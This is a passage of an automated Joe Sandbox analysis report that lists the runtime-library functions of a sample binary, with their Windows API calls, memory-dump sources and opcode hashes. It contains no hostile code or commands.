                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$ErrorLast
                                    • String ID:
                                    • API String ID: 2485089472-0
                                    • Opcode ID: 316d893a8ce0650b2d39714cb7ec34a732e4d7bcddf8303a528f39e1cc89eef4
                                    • Instruction ID: 2a568db2b9de5f3d3952925f591753c4f0f9a6cd13fb066544a398ecbd22144d
                                    • Opcode Fuzzy Hash: 316d893a8ce0650b2d39714cb7ec34a732e4d7bcddf8303a528f39e1cc89eef4
                                    • Instruction Fuzzy Hash: 6801D2352C4A1866DB339B744C05BEE73DCAF06742F050C51F845DD061C7E6EA80AAB3
                                    Function 0036AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0036B019
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Info
                                    • String ID:
                                    • API String ID: 1807457897-3916222277
                                    • Opcode ID: 85b7c729b78b9ddb9461fb740715a90ddb650a162eced43527b4f179f53a03d1
                                    • Instruction ID: c184761c294aeabf4322fa1257aea2bd5ac68ab59de3531df4eee6f743572e63
                                    • Opcode Fuzzy Hash: 85b7c729b78b9ddb9461fb740715a90ddb650a162eced43527b4f179f53a03d1
                                    • Instruction Fuzzy Hash: 6D41F4B050428CAADB238B248C94AF6FBADEB46304F1444EDE59AC7146E3359A85DF20
                                    Function 0036A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0036A79D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx
                                    • API String ID: 2568140703-3893581201
                                    • Opcode ID: 938d2c74c0ee0348cb73fd41bd61e14bea78381872971086af578e88b8fcd28c
                                    • Instruction ID: 7a8bb5779d2f0efa356308dd206510ff349d38dacb0f5d1528f1861faa619169
                                    • Opcode Fuzzy Hash: 938d2c74c0ee0348cb73fd41bd61e14bea78381872971086af578e88b8fcd28c
                                    • Instruction Fuzzy Hash: 4501D336544209BBDF135FA0DC05DEE7F66EF08760F058154FE1829161CA768A71BF92
                                    Function 0036A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00369D2F), ref: 0036A715
                                    Strings
                                    • InitializeCriticalSectionEx, xrefs: 0036A6E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CountCriticalInitializeSectionSpin
                                    • String ID: InitializeCriticalSectionEx
                                    • API String ID: 2593887523-3084827643
                                    • Opcode ID: 03fc637e2d7207c4dc6b32d18e0df39b7286cc6452bd33a02e949d451853b650
                                    • Instruction ID: 1a3fec847e52f74acc21a1772f635aeeb843748aad3fe7a28cd3ceb8941da0f2
                                    • Opcode Fuzzy Hash: 03fc637e2d7207c4dc6b32d18e0df39b7286cc6452bd33a02e949d451853b650
                                    • Instruction Fuzzy Hash: 69F0BE3164520CBBDB276F60CC05DAE7F65EF08B20F408054FC0D6A261DA719E50BBD1
                                    Function 0036A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Alloc
                                    • String ID: FlsAlloc
                                    • API String ID: 2773662609-671089009
                                    • Opcode ID: 14cca8709b1a6cde37590a548da3ac0c85fa36c2d0a834f7df15c7ea6698c6c7
                                    • Instruction ID: fefdd97acb02ad2b67a6830d719502a51d126b5f74516ec1ef2cf21cbef52a65
                                    • Opcode Fuzzy Hash: 14cca8709b1a6cde37590a548da3ac0c85fa36c2d0a834f7df15c7ea6698c6c7
                                    • Instruction Fuzzy Hash: 2EE05C30745218AB9237AB50CC01DADBB58CB19711F418054FC0D2B240CD744E00A6D6
                                    Function 0036329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • try_get_function.LIBVCRUNTIME ref: 003632AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: try_get_function
                                    • String ID: FlsAlloc
                                    • API String ID: 2742660187-671089009
                                    • Opcode ID: e114d7cae847d3b7dfb77fe0111f8be96750914728bbab651066642295f62011
                                    • Instruction ID: 958f08d60b91167961c31911711e0e01220cefd97cc2da42d77b8b4c4c050626
                                    • Opcode Fuzzy Hash: e114d7cae847d3b7dfb77fe0111f8be96750914728bbab651066642295f62011
                                    • Instruction Fuzzy Hash: E1D02B21B807346A813732C06C039EE7E048702FB2F458152FE0C2E14284E5964061C5
                                    Function 0035D8B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 539d041dd125146a0dc012634216d94da5e579942841bdd402f34a3a17f34a9e
                                    • Instruction ID: 53dcc5c9aab6a74851fc1b63def62c377a17ccee674d8a937234f5e20ea4c1b8
                                    • Opcode Fuzzy Hash: 539d041dd125146a0dc012634216d94da5e579942841bdd402f34a3a17f34a9e
                                    • Instruction Fuzzy Hash: 1FB0129526C001AD313B6608AC06E37036CC4C2B13330C01AFC0ED42D0D4405C0E0831
                                    Function 0035D8AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 7fb9d35a745b6cbbf7ef0a31d7559b1030f2f704e13daaa7cf19a75d4d617dc0
                                    • Instruction ID: d4e1395dbd1bcb9858404f62a86d5d2fb095aefab3831833dd2514aff03e41a9
                                    • Opcode Fuzzy Hash: 7fb9d35a745b6cbbf7ef0a31d7559b1030f2f704e13daaa7cf19a75d4d617dc0
                                    • Instruction Fuzzy Hash: 0AB0129926C101AD313B6208AC46E3B026CD4C1B13330801AF80ED44D0D4445C0C0931
                                    Function 0035D891 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: decf2fca35a973b36bf1d453dad46a8b46904457f9bad01cf93c0d41352c797d
                                    • Instruction ID: 4f75c22a5eedc549b865de3b6a19252f19b0aac7b86c715667dd2606a332631a
                                    • Opcode Fuzzy Hash: decf2fca35a973b36bf1d453dad46a8b46904457f9bad01cf93c0d41352c797d
                                    • Instruction Fuzzy Hash: A2B0129926C301BD313B2204AC56D3B022CC4C1B13330852AF80EE40E0D5445C4C4831
                                    Function 0035D8F2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 7cddb39596c61793d40669c28c83d15a69bb2399b9bc287a796b1b8c4bf16057
                                    • Instruction ID: f19c82965ff82acc0ce17b8ddec91198151670fa8900fb3221a6152fb09ee78e
                                    • Opcode Fuzzy Hash: 7cddb39596c61793d40669c28c83d15a69bb2399b9bc287a796b1b8c4bf16057
                                    • Instruction Fuzzy Hash: 4AB012E536C001AD313F6208AD06E37026CC4C1B13330801AFC0FD40E0D4405D0D0831
                                    Function 0035D8FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 79bcdb4f4879e9fbbcabb7cef5f6f53bf7d5f4129f2c03e88659a0f8f9abb3be
                                    • Instruction ID: 4fb2e1ed651d3cb66e77f8f9c7f1c441bae88d5d20aaeb5cf5347b892c633381
                                    • Opcode Fuzzy Hash: 79bcdb4f4879e9fbbcabb7cef5f6f53bf7d5f4129f2c03e88659a0f8f9abb3be
                                    • Instruction Fuzzy Hash: 38B012E526C001AD313F6209AC06E37026CC4C1B13330801AF80ED44E0D4405C0C0831
                                    Function 0035D8E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 3222f9d9956792c9f0b5b115410bbdcbf5ba47ecae974c0cc8aff00fbc5a7835
                                    • Instruction ID: 9bbd14eadb0f1de9df5da5155f56097081a44247280f068ba1aeddb754795763
                                    • Opcode Fuzzy Hash: 3222f9d9956792c9f0b5b115410bbdcbf5ba47ecae974c0cc8aff00fbc5a7835
                                    • Instruction Fuzzy Hash: 53B012E526C101AD317B6208AC06E37026CC4C1B13330811AF80ED40E0D4405C4C0831
                                    Function 0035D8DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 73b95d5b8723849e41b111a98057340d6142efaee42f390b8179930d6800d870
                                    • Instruction ID: 5d2da604c36bcb44c4b46f2ef53a4311c0c95e210e5d66124ba1b99ceacb1ad7
                                    • Opcode Fuzzy Hash: 73b95d5b8723849e41b111a98057340d6142efaee42f390b8179930d6800d870
                                    • Instruction Fuzzy Hash: 10B012E526C001AD313B6208AC06E37026CC4C2B13330C01AFC0ED40E0D4405C0D0831
                                    Function 0035D8C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 26acc380fe1bcd9f4cfa30939b98b78b84b272e786daafc8671814f43593e032
                                    • Instruction ID: 89a011079d1646777628db2bd5f6545d21f194936e8e020fdb45d950c2f18aeb
                                    • Opcode Fuzzy Hash: 26acc380fe1bcd9f4cfa30939b98b78b84b272e786daafc8671814f43593e032
                                    • Instruction Fuzzy Hash: EEB0129526C141AD317B6208AC06E37036CC4C1B13330C11AF80ED42D0D4405C8D0831
                                    Function 0035D8CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 9eeba0be5dc406899831dcfc987297efa21555af4a23a8a619e7cbfee9a031d3
                                    • Instruction ID: 4f9ea29f971ad0650d52b5dde62dfbdd598c91c33b8c208dcbda7d6370aa710d
                                    • Opcode Fuzzy Hash: 9eeba0be5dc406899831dcfc987297efa21555af4a23a8a619e7cbfee9a031d3
                                    • Instruction Fuzzy Hash: DCB012953AC001AD313F6608AD06E37036CC4C1B13330C01AFC0ED42D0D4405C0E0831
                                    Function 0035D924 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: d5241d67806f134d159cc54459ac765a743aff3aa5bf71c33c2fcd347ebdd981
                                    • Instruction ID: c616184dde5a544bc07f1e9e08661dc5e340e2569f4795e57314f40c4b0b7cc5
                                    • Opcode Fuzzy Hash: d5241d67806f134d159cc54459ac765a743aff3aa5bf71c33c2fcd347ebdd981
                                    • Instruction Fuzzy Hash: EBB0129527D001AD317B6308AC06E3702AEC8C1B13330801AF80ED44D0D4405C0C0831
